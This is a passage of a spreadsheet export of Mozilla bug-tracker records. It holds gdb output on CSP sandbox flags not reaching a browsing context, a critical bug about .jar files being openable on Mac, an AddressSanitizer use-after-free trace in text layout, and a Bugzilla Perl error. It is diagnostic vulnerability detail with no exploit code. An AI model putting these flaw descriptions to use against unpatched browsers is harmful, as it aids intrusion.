However, the CSP sandbox header didn't change the sandbox flags of the BC:
```cpp
(gdb) b nsDocShell.cpp:13100
Thread 1 "Isolated Web Co" hit Breakpoint 1, nsDocShell::OnLinkClickSync (this=0x7f514773d400, aContent=0x7f5142609030, aLoadState=0x7f516e69b480, aNoOpenerImplied=false, aTriggeringPrincipal=0x7f514284d880) at /m-c/docshell/base/nsDocShell.cpp:13100
13100     aLoadState-&gt;SetTriggeringSandboxFlags(triggeringSandboxFlags);
(gdb) p GetDocument()-&gt;GetSandboxFlags()
$1 = 1048555
(gdb) p mBrowsingContext-&gt;GetSandboxFlags()
$2 = (const uint32_t &amp;) @0x7f514a905b64: 0
(gdb) p triggeringSandboxFlags
$3 = 0
```
Note that if the sandbox isn't set by CSP header, but `&lt;iframe sandbox="allow-same-origin allow-top-navigation"&gt;` instead, the issue doesn't occur. In that case, the sandbox flags on the document and BC are aligned, as expected:
```cpp
(gdb) b nsDocShell.cpp:13100
Thread 1 "Isolated Web Co" hit Breakpoint 1, nsDocShell::OnLinkClickSync (this=0x7f5147740000, aContent=0x7f5142609190, aLoadState=0x7f516e69b480, aNoOpenerImplied=false, aTriggeringPrincipal=0x7f514284d1a0) at /m-c/docshell/base/nsDocShell.cpp:13100
13100     aLoadState-&gt;SetTriggeringSandboxFlags(triggeringSandboxFlags);
(gdb) p GetDocument()-&gt;GetSandboxFlags()
$1 = 1048555
(gdb) p mBrowsingContext-&gt;GetSandboxFlags()
$2 = (const uint32_t &amp;) @0x7f516e6d3164: 1048555
(gdb) p triggeringSandboxFlags
$3 = 1048555
```
(Here, the BC's sandbox flags were updated from `nsFrameLoader::ApplySandboxFlags()`.)</t>
        </is>
      </c>
      <c r="X1155" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1156">
      <c r="A1156" t="n">
        <v>663899</v>
      </c>
      <c r="B1156" t="inlineStr">
        <is>
          <t>2011-06-13 10:59:14 -0700</t>
        </is>
      </c>
      <c r="C1156" t="inlineStr">
        <is>
          <t>.jar should not be openable on Mac or Linux, download only (CVE-2011-3666)</t>
        </is>
      </c>
      <c r="D1156" t="inlineStr">
        <is>
          <t>2016-06-22 12:16:36 -0700</t>
        </is>
      </c>
      <c r="E1156" t="n">
        <v>1</v>
      </c>
      <c r="F1156" t="n">
        <v>1</v>
      </c>
      <c r="G1156" t="n">
        <v>6</v>
      </c>
      <c r="H1156" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1156" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1156" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K1156" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1156" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1156" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1156" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1156" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1156" t="inlineStr">
        <is>
          <t>[sg:critical][qa-examined-192][qa!]</t>
        </is>
      </c>
      <c r="Q1156" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1156" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1156" t="inlineStr">
        <is>
          <t>mozilla9</t>
        </is>
      </c>
      <c r="T1156" t="n">
        <v>1</v>
      </c>
      <c r="U1156" t="n">
        <v>0</v>
      </c>
      <c r="V1156" t="n">
        <v>91</v>
      </c>
      <c r="W1156" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #662309 +++
On windows it was simple to make .jar executable in nsLocalFileWin and force users to download a .jar rather than letting them "open" it and run a privileged local Java Application. On Mac most files with the executable bit set do trigger the "save only" path, but something is special-casing .jar (noticing that the system has a handler for it) and letting it be opened anyway. I could not find any equivalent "blacklist" on Mac that .jar could be added to, and we desperately need one: just because the OS knows how to run a java archive (or other types) doesn't mean it's wise to do so from a web page.
Someone who knows mac will have to take this. The original bug on this was externally reported and the Windows variant is fixed in Fx5 and 3.6.18 -- this is important to fix soon.</t>
        </is>
      </c>
      <c r="X1156" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1157">
      <c r="A1157" t="n">
        <v>769303</v>
      </c>
      <c r="B1157" t="inlineStr">
        <is>
          <t>2012-06-28 08:50:22 -0700</t>
        </is>
      </c>
      <c r="C1157" t="inlineStr">
        <is>
          <t>Heap-use-after-free in gfxTextRun::CanBreakLineBefore</t>
        </is>
      </c>
      <c r="D1157" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:58 -0700</t>
        </is>
      </c>
      <c r="E1157" t="n">
        <v>1</v>
      </c>
      <c r="F1157" t="n">
        <v>1</v>
      </c>
      <c r="G1157" t="n">
        <v>3</v>
      </c>
      <c r="H1157" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1157" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1157" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K1157" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1157" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1157" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1157" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1157" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1157" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q1157" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1157" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1157" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T1157" t="n">
        <v>1</v>
      </c>
      <c r="U1157" t="n">
        <v>0</v>
      </c>
      <c r="V1157" t="n">
        <v>36</v>
      </c>
      <c r="W1157" t="inlineStr">
        <is>
          <t>Created attachment 637530
Testcase
Reproduces on 20120627175514
http://hg.mozilla.org/mozilla-central/rev/d254c07f3301
Crash and free stacks look different from https://bugzilla.mozilla.org/show_bug.cgi?id=767765
=================================================================
==22134== ERROR: AddressSanitizer heap-use-after-free on address 0x7f3bb2655488 at pc 0x7f3bd8f94d3d bp 0x7fffa294c730 sp 0x7fffa294c728
READ of size 8 at 0x7f3bb2655488 thread T0
    #0 0x7f3bd8f94d3d in gfxTextRun::CanBreakLineBefore(unsigned int) firefox/src/modules/zlib/src/inffast.c:0
    #1 0x7f3bd8f90835 in nsTextFrame::AddInlineMinWidthForFlow(nsRenderingContext*, nsIFrame::InlineMinWidthData*, nsTextFrame::TextRunType) firefox/src/layout/generic/nsTextFrameThebes.cpp:6644
    #2 0x7f3bd8f965c8 in nsTextFrame::AddInlineMinWidth(nsRenderingContext*, nsIFrame::InlineMinWidthData*) firefox/src/layout/generic/nsTextFrameThebes.cpp:6746
    #3 0x7f3bd8a1f7b4 in nsBlockFrame::GetMinWidth(nsRenderingContext*) firefox/src/layout/generic/nsBlockFrame.cpp:754
    #4 0x7f3bd8b99595 in nsFrame::ShrinkWidthToFit(nsRenderingContext*, int) firefox/src/layout/generic/nsFrame.cpp:3935
    #5 0x7f3bd8b1270a in nsContainerFrame::ComputeAutoSize(nsRenderingContext*, nsSize, int, nsSize, nsSize, nsSize, bool) firefox/src/layout/generic/nsContainerFrame.cpp:860
    #6 0x7f3bd8b94d8e in nsFrame::ComputeSize(nsRenderingContext*, nsSize, int, nsSize, nsSize, nsSize, unsigned int) firefox/src/layout/generic/nsFrame.cpp:3780
    #7 0x7f3bd8ac780d in FloatMarginWidth(nsHTMLReflowState const&amp;, int, nsIFrame*, nsCSSOffsetState const&amp;) firefox/src/layout/generic/nsBlockReflowState.cpp:562
    #8 0x7f3bd8ac0ff2 in nsBlockReflowState::FlowAndPlaceFloat(nsIFrame*) firefox/src/layout/generic/nsBlockReflowState.cpp:608
    #9 0x7f3bd8abf61b in nsBlockReflowState::AddFloat(nsLineLayout*, nsIFrame*, int) firefox/src/layout/generic/nsBlockReflowState.cpp:503
    #10 0x7f3bd8dbc403 in nsLineLayout::AddFloat(nsIFrame*, int) firefox/src/layout/generic/nsLineLayout.h:195
    #11 0x7f3bd8db530b in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) firefox/src/layout/generic/nsLineLayout.cpp:868
    #12 0x7f3bd8a6fe3f in nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) firefox/src/layout/generic/nsBlockFrame.cpp:3834
    #13 0x7f3bd8a6989a in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) firefox/src/layout/generic/nsBlockFrame.cpp:3630
    #14 0x7f3bd8a5c317 in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/src/layout/generic/nsBlockFrame.cpp:3482
    #15 0x7f3bd8a4accc in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/src/layout/generic/nsBlockFrame.cpp:2570
    #16 0x7f3bd8a30131 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) firefox/src/layout/generic/nsBlockFrame.cpp:2020
    #17 0x7f3bd8a23bcf in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsBlockFrame.cpp:1069
    #18 0x7f3bd8b136a7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/src/layout/generic/nsContainerFrame.cpp:906
    #19 0x7f3bd8ce39a7 in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsCanvasFrame.cpp:429
    #20 0x7f3bd8b136a7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/src/layout/generic/nsContainerFrame.cpp:906
    #21 0x7f3bd8c5d74e in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) firefox/src/layout/generic/nsGfxScrollFrame.cpp:517
    #22 0x7f3bd8c62ffa in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) firefox/src/layout/generic/nsGfxScrollFrame.cpp:617
    #23 0x7f3bd8c6731f in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsGfxScrollFrame.cpp:858
    #24 0x7f3bd8b136a7 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/src/layout/generic/nsContainerFrame.cpp:906
    #25 0x7f3bd903bea1 in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsViewportFrame.cpp:200
    #26 0x7f3bd8794ca6 in PresShell::DoReflow(nsIFrame*, bool) firefox/src/layout/base/nsPresShell.cpp:7383
    #27 0x7f3bd87c26ad in PresShell::ProcessReflowCommands(bool) firefox/src/layout/base/nsPresShell.cpp:7524
    #28 0x7f3bd87c0dbd in PresShell::FlushPendingNotifications(mozFlushType) firefox/src/layout/base/nsPresShell.cpp:3852
    #29 0x7f3bda01773e in nsDocument::FlushPendingNotifications(mozFlushType) firefox/src/content/base/src/nsDocument.cpp:6296
    #30 0x7f3bdc20db5a in nsGlobalWindow::FlushPendingNotifications(mozFlushType) firefox/src/dom/base/nsGlobalWindow.cpp:9763
    #31 0x7f3bdc24133a in nsGlobalWindow::ScrollBy(int, int) firefox/src/dom/base/nsGlobalWindow.cpp:5452
    #32 0x7f3be353289a in NS_InvokeByIndex_P firefox/src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:161
    #33 0x7f3bdee9e9db in CallMethodHelper::Call() firefox/src/js/xpconnect/src/XPCWrappedNative.cpp:2405
    #34 0x7f3bdef05db4 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) firefox/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1474
    #35 0x7f3be88569dd in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), js::CallArgs const&amp;) firefox/src/js/src/jscntxtinlines.h:400
    #36 0x7f3be87cabbd in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) firefox/src/js/src/jsinterp.cpp:2437
    #37 0x7f3be8750397 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) firefox/src/js/src/jsinterp.cpp:267
    #38 0x7f3be88637ed in js::ExecuteKernel(JSContext*, JSScript*, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) firefox/src/js/src/jsinterp.cpp:455
    #39 0x7f3be88654f0 in js::Execute(JSContext*, JSScript*, JSObject&amp;, JS::Value*) firefox/src/js/src/jsinterp.cpp:492
    #40 0x7f3be8094c46 in EvaluateUCScriptForPrincipalsCommon(JSContext*, JSObject*, JSPrincipals*, JSPrincipals*, unsigned short const*, unsigned int, char const*, unsigned int, JS::Value*, JSVersion) firefox/src/js/src/jsapi.cpp:5371
    #41 0x7f3be8096b6c in JS_EvaluateUCScriptForPrincipalsVersionOrigin firefox/src/js/src/jsapi.cpp:5408
    #42 0x7f3bdc0fbd1a in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) firefox/src/dom/base/nsJSEnvironment.cpp:1463
    #43 0x7f3bdc29e18e in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) firefox/src/dom/base/nsGlobalWindow.cpp:9057
    #44 0x7f3bdc25e272 in nsGlobalWindow::RunTimeout(nsTimeout*) firefox/src/dom/base/nsGlobalWindow.cpp:9321
    #45 0x7f3bdc29c39b in nsGlobalWindow::TimerCallback(nsITimer*, void*) firefox/src/dom/base/nsGlobalWindow.cpp:9593
    #46 0x7f3be346f0e2 in nsTimerImpl::Fire() firefox/src/xpcom/threads/nsTimerImpl.cpp:474
    #47 0x7f3be3470d1c in nsTimerEvent::Run() firefox/src/xpcom/threads/nsTimerImpl.cpp:558
    #48 0x7f3be34333d3 in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:625
    #49 0x7f3be30c242d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #50 0x7f3be221fec6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #51 0x7f3be36e5bca in MessageLoop::RunInternal() firefox/src/ipc/chromium/src/base/message_loop.cc:209
    #52 0x7f3be36e5a13 in MessageLoop::RunHandler() firefox/src/ipc/chromium/src/base/message_loop.cc:202
    #53 0x7f3be36e58f8 in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #54 0x7f3be175d9ae in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #55 0x7f3be03a7dc8 in nsAppStartup::Run() firefox/src/toolkit/components/startup/nsAppStartup.cpp:256
    #56 0x7f3bd6d8d6a7 in XREMain::XRE_mainRun() firefox/src/toolkit/xre/nsAppRunner.cpp:3786
    #57 0x7f3bd6d94062 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/src/toolkit/xre/nsAppRunner.cpp:3863
    #58 0x7f3bd6d9751b in XRE_main firefox/src/toolkit/xre/nsAppRunner.cpp:3939
    #59 0x40a91f in do_main(int, char**) firefox/src/browser/app/nsBrowserApp.cpp:160
    #60 0x40834d in main firefox/src/browser/app/nsBrowserApp.cpp:330
    #61 0x7f3bf15eac4d in ?? ??:0
0x7f3bb2655488 is located 8 bytes inside of 580-byte region [0x7f3bb2655480,0x7f3bb26556c4)
freed by thread T0 here:
    #0 0x4a2ed2 in free ??:0
    #1 0x7f3bee4785c3 in moz_free firefox/src/memory/mozalloc/mozalloc.cpp:49
    #2 0x7f3bd902be63 in gfxTextRun::operator delete(void*) firefox/src/gfx/thebes/gfxFont.h:2335
    #3 0x7f3be3a5bdd8 in ~gfxTextRun firefox/src/gfx/thebes/gfxFont.cpp:4344
    #4 0x7f3bd8f1c1de in nsTextFrame::ClearTextRun(nsTextFrame*, nsTextFrame::TextRunType) firefox/src/layout/generic/nsTextFrameThebes.cpp:4263
    #5 0x7f3bd8f18068 in BuildTextRunsScanner::AssignTextRun(gfxTextRun*, float) firefox/src/layout/generic/nsTextFrameThebes.cpp:2359
    #6 0x7f3bd8f07dd8 in BuildTextRunsScanner::BuildTextRunForFrames(void*) firefox/src/layout/generic/nsTextFrameThebes.cpp:2021
    #7 0x7f3bd8efe01d in BuildTextRunsScanner::FlushFrames(bool, bool) firefox/src/layout/generic/nsTextFrameThebes.cpp:1372
    #8 0x7f3bd8f21528 in BuildTextRuns(gfxContext*, nsTextFrame*, nsIFrame*, nsLineList_iterator const*, nsTextFrame::TextRunType) firefox/src/layout/generic/nsTextFrameThebes.cpp:1301
    #9 0x7f3bd8f1d1a4 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, gfxContext*, nsIFrame*, nsLineList_iterator const*, unsigned int*) firefox/src/layout/generic/nsTextFrameThebes.cpp:2391
    #10 0x7f3bd8f8f6c8 in nsTextFrame::AddInlineMinWidthForFlow(nsRenderingContext*, nsIFrame::InlineMinWidthData*, nsTextFrame::TextRunType) firefox/src/layout/generic/nsTextFrameThebes.cpp:6594
    #11 0x7f3bd8f965c8 in nsTextFrame::AddInlineMinWidth(nsRenderingContext*, nsIFrame::InlineMinWidthData*) firefox/src/layout/generic/nsTextFrameThebes.cpp:6746
    #12 0x7f3bd8b10bf5 in nsContainerFrame::DoInlineIntrinsicWidth(nsRenderingContext*, nsIFrame::InlineIntrinsicWidthData*, nsLayoutUtils::IntrinsicWidthType) firefox/src/layout/generic/nsContainerFrame.cpp:813
    #13 0x7f3bd8b23b06 in nsFirstLetterFrame::AddInlineMinWidth(nsRenderingContext*, nsIFrame::InlineMinWidthData*) firefox/src/layout/generic/nsFirstLetterFrame.cpp:122
    #14 0x7f3bd86b8a1b in nsLayoutUtils::MinWidthFromInline(nsIFrame*, nsRenderingContext*) firefox/src/layout/base/nsLayoutUtils.cpp:3009
    #15 0x7f3bd8b23f38 in nsFirstLetterFrame::GetMinWidth(nsRenderingContext*) firefox/src/layout/generic/nsFirstLetterFrame.cpp:137
    #16 0x7f3bd86a5453 in nsLayoutUtils::IntrinsicForContainer(nsRenderingContext*, nsIFrame*, nsLayoutUtils::IntrinsicWidthType) firefox/src/layout/base/nsLayoutUtils.cpp:2441
    #17 0x7f3bd8b8f953 in nsIFrame::InlineMinWidthData::ForceBreak(nsRenderingContext*) firefox/src/layout/generic/nsFrame.cpp:3597
    #18 0x7f3bd8b8ec67 in nsIFrame::InlineMinWidthData::OptionallyBreak(nsRenderingContext*, int) firefox/src/layout/generic/nsFrame.cpp:3622
    #19 0x7f3bd8f919bc in nsTextFrame::AddInlineMinWidthForFlow(nsRenderingContext*, nsIFrame::InlineMinWidthData*, nsTextFrame::TextRunType) firefox/src/layout/generic/nsTextFrameThebes.cpp:6698
    #20 0x7f3bd8f965c8 in nsTextFrame::AddInlineMinWidth(nsRenderingContext*, nsIFrame::InlineMinWidthData*) firefox/src/layout/generic/nsTextFrameThebes.cpp:6746
    #21 0x7f3bd8a1f7b4 in nsBlockFrame::GetMinWidth(nsRenderingContext*) firefox/src/layout/generic/nsBlockFrame.cpp:754
    #22 0x7f3bd8b99595 in nsFrame::ShrinkWidthToFit(nsRenderingContext*, int) firefox/src/layout/generic/nsFrame.cpp:3935
    #23 0x7f3bd8b1270a in nsContainerFrame::ComputeAutoSize(nsRenderingContext*, nsSize, int, nsSize, nsSize, nsSize, bool) firefox/src/layout/generic/nsContainerFrame.cpp:860
    #24 0x7f3bd8b94d8e in nsFrame::ComputeSize(nsRenderingContext*, nsSize, int, nsSize, nsSize, nsSize, unsigned int) firefox/src/layout/generic/nsFrame.cpp:3780
    #25 0x7f3bd8ac780d in FloatMarginWidth(nsHTMLReflowState const&amp;, int, nsIFrame*, nsCSSOffsetState const&amp;) firefox/src/layout/generic/nsBlockReflowState.cpp:562
    #26 0x7f3bd8ac0ff2 in nsBlockReflowState::FlowAndPlaceFloat(nsIFrame*) firefox/src/layout/generic/nsBlockReflowState.cpp:608
    #27 0x7f3bd8abf61b in nsBlockReflowState::AddFloat(nsLineLayout*, nsIFrame*, int) firefox/src/layout/generic/nsBlockReflowState.cpp:503
    #28 0x7f3bd8dbc403 in nsLineLayout::AddFloat(nsIFrame*, int) firefox/src/layout/generic/nsLineLayout.h:195
    #29 0x7f3bd8db530b in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) firefox/src/layout/generic/nsLineLayout.cpp:868
previously allocated by thread T0 here:
    #0 0x4a2f92 in malloc ??:0
    #1 0x7f3bee478a23 in moz_malloc firefox/src/memory/mozalloc/mozalloc.cpp:64
    #2 0x7f3be3a5a6f6 in gfxTextRun::AllocateStorageForTextRun(unsigned long, unsigned int) firefox/src/gfx/thebes/gfxFont.cpp:4283
    #3 0x7f3be3a3da3f in gfxTextRun::Create(gfxTextRunFactory::Parameters const*, unsigned int, gfxFontGroup*, unsigned int) firefox/src/gfx/thebes/gfxFont.cpp:4300
    #4 0x7f3be3a41205 in gfxFontGroup::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, unsigned int) firefox/src/gfx/thebes/gfxFont.cpp:3367
    #5 0x7f3bd8f14551 in gfxTextRun* MakeTextRun&lt;unsigned char&gt;(unsigned char const*, unsigned int, gfxFontGroup*, gfxTextRunFactory::Parameters const*, unsigned int) firefox/src/layout/generic/nsTextFrameThebes.cpp:533
    #6 0x7f3bd8f077c5 in BuildTextRunsScanner::BuildTextRunForFrames(void*) firefox/src/layout/generic/nsTextFrameThebes.cpp:1981
    #7 0x7f3bd8efe01d in BuildTextRunsScanner::FlushFrames(bool, bool) firefox/src/layout/generic/nsTextFrameThebes.cpp:1372
    #8 0x7f3bd8f21528 in BuildTextRuns(gfxContext*, nsTextFrame*, nsIFrame*, nsLineList_iterator const*, nsTextFrame::TextRunType) firefox/src/layout/generic/nsTextFrameThebes.cpp:1301
    #9 0x7f3bd8f1d1a4 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, gfxContext*, nsIFrame*, nsLineList_iterator const*, unsigned int*) firefox/src/layout/generic/nsTextFrameThebes.cpp:2391
    #10 0x7f3bd8f8f6c8 in nsTextFrame::AddInlineMinWidthForFlow(nsRenderingContext*, nsIFrame::InlineMinWidthData*, nsTextFrame::TextRunType) firefox/src/layout/generic/nsTextFrameThebes.cpp:6594
    #11 0x7f3bd8f965c8 in nsTextFrame::AddInlineMinWidth(nsRenderingContext*, nsIFrame::InlineMinWidthData*) firefox/src/layout/generic/nsTextFrameThebes.cpp:6746
    #12 0x7f3bd8a1f7b4 in nsBlockFrame::GetMinWidth(nsRenderingContext*) firefox/src/layout/generic/nsBlockFrame.cpp:754
    #13 0x7f3bd8b99595 in nsFrame::ShrinkWidthToFit(nsRenderingContext*, int) firefox/src/layout/generic/nsFrame.cpp:3935
    #14 0x7f3bd8b1270a in nsContainerFrame::ComputeAutoSize(nsRenderingContext*, nsSize, int, nsSize, nsSize, nsSize, bool) firefox/src/layout/generic/nsContainerFrame.cpp:860
    #15 0x7f3bd8b94d8e in nsFrame::ComputeSize(nsRenderingContext*, nsSize, int, nsSize, nsSize, nsSize, unsigned int) firefox/src/layout/generic/nsFrame.cpp:3780
    #16 0x7f3bd8ac780d in FloatMarginWidth(nsHTMLReflowState const&amp;, int, nsIFrame*, nsCSSOffsetState const&amp;) firefox/src/layout/generic/nsBlockReflowState.cpp:562
    #17 0x7f3bd8ac0ff2 in nsBlockReflowState::FlowAndPlaceFloat(nsIFrame*) firefox/src/layout/generic/nsBlockReflowState.cpp:608
    #18 0x7f3bd8abf61b in nsBlockReflowState::AddFloat(nsLineLayout*, nsIFrame*, int) firefox/src/layout/generic/nsBlockReflowState.cpp:503
    #19 0x7f3bd8dbc403 in nsLineLayout::AddFloat(nsIFrame*, int) firefox/src/layout/generic/nsLineLayout.h:195
    #20 0x7f3bd8db530b in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) firefox/src/layout/generic/nsLineLayout.cpp:868
    #21 0x7f3bd8a6fe3f in nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) firefox/src/layout/generic/nsBlockFrame.cpp:3834
    #22 0x7f3bd8a6989a in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) firefox/src/layout/generic/nsBlockFrame.cpp:3630
==22134== ABORTING
Stats: 150M malloced (164M for red zones) by 352192 calls
Stats: 41M realloced by 18995 calls
Stats: 110M freed by 224892 calls
Stats: 0M really freed by 0 calls
Stats: 344M (88113 full pages) mmaped in 86 calls
  mmaps   by size class: 8:278511; 9:49146; 10:20475; 11:18423; 12:3072; 13:2048; 14:1536; 15:384; 16:576; 17:128; 18:176; 19:40; 20:16;
  mallocs by size class: 8:265920; 9:46521; 10:16109; 11:16839; 12:2376; 13:1812; 14:1414; 15:336; 16:532; 17:113; 18:167; 19:40; 20:13;
  frees   by size class: 8:158005; 9:35984; 10:12721; 11:13639; 12:1450; 13:917; 14:1225; 15:282; 16:464; 17:99; 18:58; 19:38; 20:10;
  rfrees  by size class:
Stats: malloc large: 333 small slow: 1835
Shadow byte and word:
  0x1fe7764caa91: fd
  0x1fe7764caa90: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe7764caa70: fa fa fa fa fa fa fa fa
  0x1fe7764caa78: fa fa fa fa fa fa fa fa
  0x1fe7764caa80: fa fa fa fa fa fa fa fa
  0x1fe7764caa88: fa fa fa fa fa fa fa fa
=&gt;0x1fe7764caa90: fd fd fd fd fd fd fd fd
  0x1fe7764caa98: fd fd fd fd fd fd fd fd
  0x1fe7764caaa0: fd fd fd fd fd fd fd fd
  0x1fe7764caaa8: fd fd fd fd fd fd fd fd
  0x1fe7764caab0: fd fd fd fd fd fd fd fd</t>
        </is>
      </c>
      <c r="X1157" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1158">
      <c r="A1158" t="n">
        <v>289012</v>
      </c>
      <c r="B1158" t="inlineStr">
        <is>
          <t>2005-04-04 14:14:15 -0700</t>
        </is>
      </c>
      <c r="C1158" t="inlineStr">
        <is>
          <t>Can't use an undefined value as a HASH reference at userprefs.cgi line 142.</t>
        </is>
      </c>
      <c r="D1158" t="inlineStr">
        <is>
          <t>2005-04-27 09:00:55 -0700</t>
        </is>
      </c>
      <c r="E1158" t="n">
        <v>1</v>
      </c>
      <c r="F1158" t="n">
        <v>1</v>
      </c>
      <c r="G1158" t="n">
        <v>4</v>
      </c>
      <c r="H1158" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1158" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1158" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K1158" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L1158" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1158" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1158" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1158" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1158" t="inlineStr">
        <is>
          <t>[wanted for 2.20]</t>
        </is>
      </c>
      <c r="Q1158" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1158" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1158" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T1158" t="n">
        <v>1</v>
      </c>
      <c r="U1158" t="n">
        <v>0</v>
      </c>
      <c r="V1158" t="n">
        <v>17</v>
      </c>
      <c r="W1158" t="inlineStr">
        <is>
          <t>I saw this error on landfill when testing for regressions for LpSolit.
Line 142 appears to be:
my @setting_list = keys %{Bugzilla-&gt;user-&gt;settings};
